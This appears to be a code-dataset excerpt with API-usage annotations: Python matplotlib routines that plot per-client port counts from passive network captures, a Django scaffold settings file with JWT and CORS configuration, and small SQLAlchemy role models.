    # NOTE(review): 'plt' is never assigned in this function, so this closes
    # the module-level pyplot's current figure -- confirm that is intended.
    plt.close()
def passivetimeseries_usingclientports_plot(plt, ax, xfmt, results, title, folderpath, ylim):
    """Plot the number of distinct client ports per time bucket, one subplot per client.

    For each client IP in *results* the samples are bucketed into windows of
    _BUCKETSIZE_SEC_PORTS seconds; each bucket contributes one point whose
    y value is the number of distinct client ports seen in that window.
    The figure is saved as both PDF and PNG under *folderpath*.

    Args:
        plt, ax, xfmt: figure, axes grid (n rows x 1 column) and x-axis date
            formatter, as returned by passivetimeseries_usingbandwidth_createplot.
        results: mapping clientIP -> list of sample dicts with keys
            "clientPort" and "timestamp".
        title: base string for the output file names.
        folderpath: output directory (created by createfolder if missing).
        ylim: upper y-axis limit.

    Fixes over the previous version:
        * the running minimum timestamp was assigned to a typo'd name
          ("timemin"), so time_min was never lowered after the first sample;
        * the y-axis label claimed "Mbps" although the plotted quantity is a
          port count;
        * the trailing (still-open) bucket was silently dropped and is now
          flushed after the loop.
    """
    time_min = None
    time_max = None
    xvalues = []
    yvalues = []
    titles = []
    for clientIP, clientresults in results.items():
        times = []
        clientportsnumber = []
        clientportslist = []
        first_timestamp = None
        for elem in clientresults:
            # Track the global time range so all subplots share one x axis.
            if time_min is None:
                time_min = elem["timestamp"]
                time_max = elem["timestamp"]
            if time_min > elem["timestamp"]:
                time_min = elem["timestamp"]
            if time_max < elem["timestamp"]:
                time_max = elem["timestamp"]
            if first_timestamp is None:
                # Open the first bucket.
                first_timestamp = elem["timestamp"]
                clientportslist.append(elem["clientPort"])
                continue
            if (elem["timestamp"] - first_timestamp).total_seconds() < _BUCKETSIZE_SEC_PORTS:
                # Still inside the current bucket: record unseen ports only.
                if elem["clientPort"] not in clientportslist:
                    clientportslist.append(elem["clientPort"])
                continue
            # Close the current bucket and open a new one starting at elem.
            times.append(elem["timestamp"])
            clientportsnumber.append(len(clientportslist))
            first_timestamp = elem["timestamp"]
            clientportslist = [elem["clientPort"]]
        if first_timestamp is not None and clientportslist:
            # Flush the final, still-open bucket (previously discarded).
            times.append(first_timestamp)
            clientportsnumber.append(len(clientportslist))
        xvalues.append(times)
        yvalues.append(clientportsnumber)
        titles.append(clientIP)
    for k in range(0, len(xvalues)):  # one subplot per client
        if len(xvalues[k]) != 0:
            ax[k, 0].tick_params(axis="both", labelsize=_TICK_SIZE)
            ax[k, 0].set_xlabel("t", fontsize=_XLABEL_SIZE)
            # Fixed: the y axis shows a port count, not a bandwidth in Mbps.
            ax[k, 0].set_ylabel("ports", fontsize=_YLABEL_SIZE)
            ax[k, 0].set_ylim(0, ylim)
            ax[k, 0].set_xlim(time_min, time_max)
            ax[k, 0].set_title("client " + str(k + 1) + "- with IP = " + titles[k], fontsize=_TITLE_SIZE)
            ax[k, 0].xaxis.set_major_formatter(xfmt)
            ax[k, 0].plot(xvalues[k], yvalues[k], marker=_TIMEPLOT_MARKERS[k], markersize=3,
                          label=titles[k], color=_TIMEPLOT_COLORS[k], linestyle="None")
    createfolder(folderpath)
    plt.tight_layout()
    pdfpage = PdfPages(folderpath + title + ".pdf")
    pdfpage.savefig(bbox_inches="tight")
    pdfpage.close()
    plt.savefig(folderpath + title + ".png", bbox_inches="tight")
    return
def passivetimeseries_usingclientports(config_parser, section, mode, direction, connectiontype, ylim, server, ncol,
                                       legendypos, logger): #edgeserver=edge/cloud
    """Drive the client-port-count time-series plotting for every configured experiment.

    For each (clientnumber, noise, dashfile) combination in the config
    *section*, reads the sorted passive-capture CSV with
    readbandwidthvalues_self_timeplot and renders one figure per combination
    via passivetimeseries_usingclientports_plot.

    Args:
        config_parser: ConfigParser holding the experiment description.
        section: name of the config section to read from.
        mode: must be "self" (asserted below).
        direction: direction label used in the output file names.
        connectiontype: connection type used in file and folder names.
        ylim: upper y-axis limit forwarded to the plot function.
        server: capture segment ("edge"/"cloud" elsewhere -- TODO confirm)
            forwarded to the CSV reader.
        ncol, legendypos: not used in this function -- presumably kept for
            signature parity with sibling plot drivers (TODO confirm).
        logger: logger for debug output.
    """
    assert mode == "self"
    clientnumberlist = getclientnumberlist(config_parser=config_parser, section=section, conntype=connectiontype)
    dashfileslist = getdashfilelist(config_parser=config_parser, section=section)
    noiselist = getnoiselist(config_parser=config_parser, section=section)
    logger.debug("clientnumberlist" + str(clientnumberlist))
    logger.debug ("dashfileslist" + str(dashfileslist))
    logger.debug ("noiselist" + str(noiselist))
    for clientnumber in clientnumberlist:
        for noise in noiselist:
            for dashfile in dashfileslist:
                # Build the output base name and the input CSV path for this
                # (clientnumber, noise, dashfile) combination.
                title = str(mode) + "-" + str(direction) + "-" + str(dashfile) + str(clientnumber) + "-"
                title += str(noise) + "-" + str(server) + "_plotclientports"
                filename = "csv/passive/sorted/" + mode + "-bandwidth-" + direction + "-" + connectiontype + "-"
                filename += str(clientnumber) + "clients-" + dashfile + "-noise" + noise + "_"
                filename += config_parser.get(section, "from_passive") + "-"
                filename += config_parser.get(section, "to_passive") + "_SORTED.csv"
                folderpath = "time/bandwidth/" + str(connectiontype) + "/"
                ret = readbandwidthvalues_self_timeplot(config_parser=config_parser, section=section, inputfile=filename,
                                                        segment=server, conntype=connectiontype, logger=logger)
                # One subplot row per client IP found in the CSV.
                plt, ax, xfmt = passivetimeseries_usingbandwidth_createplot(colsnumber=1, plottitle=title,
                                                                            rowsnumber=len(ret))
                #passivetimeseries_usingbandwidth_plot(plt=plt, ax=ax, xfmt=xfmt, results=ret, title=title,
                #        folderpath=folderpath, ylim=ylim)
                passivetimeseries_usingclientports_plot(plt=plt, ax=ax, xfmt=xfmt, results=ret, title=title,
                                                        folderpath=folderpath, ylim=ylim)
                plt.close()
|
[
"matplotlib.backends.backend_pdf.PdfPages",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.close",
"matplotlib.pyplot.yticks",
"readcsv.readbandwidthvalues_mim_timeplot_usingfixbuckets",
"matplotlib.dates.DateFormatter",
"datetime.datetime.now",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.delaxes",
"matplotlib.pyplot.gcf",
"readcsv.readbandwidthvalues_mim_timeplot",
"sys.exit",
"os.makedirs",
"matplotlib.pyplot.plot",
"readcsv.readbandwidthvalues_self_timeplot",
"collections.OrderedDict",
"matplotlib.pyplot.savefig"
] |
[((2029, 2068), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 0.6 * nclient)'}), '(figsize=(15, 0.6 * nclient))\n', (2039, 2068), True, 'import matplotlib.pyplot as plt\n'), ((2077, 2086), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2084, 2086), True, 'import matplotlib.pyplot as plt\n'), ((2467, 2494), 'matplotlib.dates.DateFormatter', 'md.DateFormatter', (['formatter'], {}), '(formatter)\n', (2483, 2494), True, 'import matplotlib.dates as md\n'), ((3657, 3698), 'matplotlib.pyplot.yticks', 'plt.yticks', (['ytick_positions', 'ytick_labels'], {}), '(ytick_positions, ytick_labels)\n', (3667, 3698), True, 'import matplotlib.pyplot as plt\n'), ((3759, 3796), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (3767, 3796), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((3864, 3925), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (3875, 3925), True, 'import matplotlib.pyplot as plt\n'), ((3930, 3941), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3939, 3941), True, 'import matplotlib.pyplot as plt\n'), ((6556, 6619), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'ncols': 'colsnumber', 'nrows': 'rowsnumber', 'squeeze': '(False)'}), '(ncols=colsnumber, nrows=rowsnumber, squeeze=False)\n', (6568, 6619), True, 'import matplotlib.pyplot as plt\n'), ((6874, 6901), 'matplotlib.dates.DateFormatter', 'md.DateFormatter', (['formatter'], {}), '(formatter)\n', (6890, 6901), True, 'import matplotlib.dates as md\n'), ((22035, 22053), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (22051, 22053), True, 'import matplotlib.pyplot as plt\n'), ((22069, 22106), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (22077, 
22106), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((22174, 22235), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (22185, 22235), True, 'import matplotlib.pyplot as plt\n'), ((1816, 1842), 'os.makedirs', 'os.makedirs', (['directoryname'], {}), '(directoryname)\n', (1827, 1842), False, 'import os\n'), ((3412, 3528), 'matplotlib.pyplot.plot', 'plt.plot', (['times', 'ypos'], {'marker': '_TIMEPLOT_MARKERS[i]', 'linestyle': '"""None"""', 'label': 'clientIP', 'color': '_TIMEPLOT_COLORS[i]'}), "(times, ypos, marker=_TIMEPLOT_MARKERS[i], linestyle='None', label=\n clientIP, color=_TIMEPLOT_COLORS[i])\n", (3420, 3528), True, 'import matplotlib.pyplot as plt\n'), ((11595, 11613), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11611, 11613), True, 'import matplotlib.pyplot as plt\n'), ((11633, 11670), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (["(folderpath + title + '.pdf')"], {}), "(folderpath + title + '.pdf')\n", (11641, 11670), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((11750, 11811), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(folderpath + title + '.png')"], {'bbox_inches': '"""tight"""'}), "(folderpath + title + '.png', bbox_inches='tight')\n", (11761, 11811), True, 'import matplotlib.pyplot as plt\n'), ((11827, 11838), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11836, 11838), True, 'import matplotlib.pyplot as plt\n'), ((12199, 12212), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12210, 12212), False, 'from collections import OrderedDict\n'), ((12234, 12247), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12245, 12247), False, 'from collections import OrderedDict\n'), ((15270, 15288), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15286, 15288), True, 'import matplotlib.pyplot as 
plt\n'), ((15566, 15577), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15575, 15577), True, 'import matplotlib.pyplot as plt\n'), ((2403, 2412), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (2410, 2412), True, 'import matplotlib.pyplot as plt\n'), ((6809, 6818), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (6816, 6818), True, 'import matplotlib.pyplot as plt\n'), ((1950, 1961), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1958, 1961), False, 'import sys\n'), ((2291, 2314), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2312, 2314), False, 'import datetime\n'), ((6757, 6780), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (6778, 6780), False, 'import datetime\n'), ((11201, 11219), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11217, 11219), True, 'import matplotlib.pyplot as plt\n'), ((11514, 11525), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11523, 11525), True, 'import matplotlib.pyplot as plt\n'), ((14977, 14998), 'matplotlib.pyplot.delaxes', 'plt.delaxes', (['ax[x, y]'], {}), '(ax[x, y])\n', (14988, 14998), True, 'import matplotlib.pyplot as plt\n'), ((23712, 23876), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (23745, 23876), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((24563, 24574), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (24572, 24574), True, 'import matplotlib.pyplot as plt\n'), ((2365, 2388), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2386, 2388), False, 'import 
datetime\n'), ((5496, 5660), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (5529, 5660), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((17558, 17722), 'readcsv.readbandwidthvalues_self_timeplot', 'readbandwidthvalues_self_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (17591, 17722), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((18617, 18842), 'readcsv.readbandwidthvalues_mim_timeplot_usingfixbuckets', 'readbandwidthvalues_mim_timeplot_usingfixbuckets', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger', 'bucketsize_microsec': 'bucketsize_microsec'}), '(config_parser=\n config_parser, section=section, inputfile=filename, segment=server,\n conntype=connectiontype, logger=logger, bucketsize_microsec=\n bucketsize_microsec)\n', (18665, 18842), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((19491, 19502), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (19500, 19502), True, 'import matplotlib.pyplot as plt\n'), ((5836, 5999), 
'readcsv.readbandwidthvalues_mim_timeplot', 'readbandwidthvalues_mim_timeplot', ([], {'config_parser': 'config_parser', 'section': 'section', 'inputfile': 'filename', 'segment': 'server', 'conntype': 'connectiontype', 'logger': 'logger'}), '(config_parser=config_parser, section=\n section, inputfile=filename, segment=server, conntype=connectiontype,\n logger=logger)\n', (5868, 5999), False, 'from readcsv import readbandwidthvalues_self_timeplot, readbandwidthvalues_mim_timeplot, readbandwidthvalues_mim_timeplot_usingfixbuckets\n'), ((6341, 6352), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (6349, 6352), False, 'import sys\n')]
|
"""
Django settings for scaffold project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import datetime
import os
from rest_framework import ISO_8601
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): '<KEY>' is a scrubbed placeholder -- supply a real key
# (e.g. from an environment variable) before deploying.
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'corsheaders',
    'django_extensions',
    'social_django',
    'drf_jwt_util',
    'rest_framework',
    'user',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    # CorsMiddleware is placed before CommonMiddleware, as required by
    # django-cors-headers so CORS headers are added to every response.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'scaffold.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'scaffold.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'ja-JP'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
# Custom user model defined in the local 'user' app.
AUTH_USER_MODEL = 'user.User'
# CORS: accept requests from any origin (development-friendly; tighten for
# production).
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_HEADERS = (
    'X-CSRFToken',
    'Content-Type',
    'Authorization',
    'Origin',
    'Content-Disposition',
    'x-oauth2-callback-uri', # custom header used only by the OAuth2 flow
)
# django-rest-framework-jwt configuration: access and refresh tokens are
# both valid for one year; payload/response handlers come from drf_jwt_util.
JWT_AUTH = {
    'JWT_EXPIRATION_DELTA': datetime.timedelta(days=365),
    'JWT_ALLOW_REFRESH': True,
    'JWT_REFRESH_EXPIRATION_DELTA': datetime.timedelta(days=365),
    'JWT_PAYLOAD_HANDLER': 'drf_jwt_util.jwt.jwt_payload_handler',
    'JWT_RESPONSE_PAYLOAD_HANDLER': 'drf_jwt_util.jwt.jwt_response_payload_handler',
    'JWT_PAYLOAD_GET_USERNAME_HANDLER': 'drf_jwt_util.jwt.jwt_get_username_from_payload_handler',
}
# http://www.django-rest-framework.org/
# JSON bodies are rendered/parsed in camelCase via djangorestframework-camel-case;
# dates accept ISO 8601 as well as 'YYYY/MM/DD'.
REST_FRAMEWORK = {
    'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
    'PAGE_SIZE': 100,
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'drf_jwt_util.auth.JWTAuthentication',
        'rest_framework.authentication.SessionAuthentication',
    ),
    'DEFAULT_RENDERER_CLASSES': (
        'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
        'rest_framework.renderers.BrowsableAPIRenderer',
    ),
    'DEFAULT_PARSER_CLASSES': (
        'djangorestframework_camel_case.parser.CamelCaseJSONParser',
        'rest_framework.parsers.FormParser',
        'rest_framework.parsers.MultiPartParser'
    ),
    'DATE_INPUT_FORMATS': (ISO_8601, '%Y/%m/%d'),
    'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.URLPathVersioning',
}
DRF_JWT_UTIL = {
    "USER_SERIALIZER": "user.serializers.UserSerializer",
}
|
[
"os.path.abspath",
"datetime.timedelta",
"os.path.join"
] |
[((3541, 3569), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (3559, 3569), False, 'import datetime\n'), ((3638, 3666), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (3656, 3666), False, 'import datetime\n'), ((488, 513), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (503, 513), False, 'import os\n'), ((2393, 2429), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (2405, 2429), False, 'import os\n')]
|
from db import db
class Role(db.Model):
    """A named user role (e.g. "admin"); linked to users via UserRoles."""
    __tablename__='roles'
    id = db.Column(db.Integer(), primary_key=True)
    # Role names must be unique across the table.
    name = db.Column(db.String(50), unique=True)
# Define the UserRoles association table
class UserRoles(db.Model):
    """Many-to-many link between users and roles.

    Rows are removed automatically when the referenced user or role is
    deleted (ON DELETE CASCADE on both foreign keys).
    """
    __tablename__ = 'user_roles'
    id = db.Column(db.Integer(), primary_key=True)
    user_id = db.Column(db.Integer(), db.ForeignKey('users.id', ondelete='CASCADE'))
    role_id = db.Column(db.Integer(), db.ForeignKey('roles.id', ondelete='CASCADE'))
|
[
"db.db.String",
"db.db.Integer",
"db.db.ForeignKey"
] |
[((87, 99), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (97, 99), False, 'from db import db\n'), ((140, 153), 'db.db.String', 'db.String', (['(50)'], {}), '(50)\n', (149, 153), False, 'from db import db\n'), ((289, 301), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (299, 301), False, 'from db import db\n'), ((345, 357), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (355, 357), False, 'from db import db\n'), ((359, 404), 'db.db.ForeignKey', 'db.ForeignKey', (['"""users.id"""'], {'ondelete': '"""CASCADE"""'}), "('users.id', ondelete='CASCADE')\n", (372, 404), False, 'from db import db\n'), ((430, 442), 'db.db.Integer', 'db.Integer', ([], {}), '()\n', (440, 442), False, 'from db import db\n'), ((444, 489), 'db.db.ForeignKey', 'db.ForeignKey', (['"""roles.id"""'], {'ondelete': '"""CASCADE"""'}), "('roles.id', ondelete='CASCADE')\n", (457, 489), False, 'from db import db\n')]
|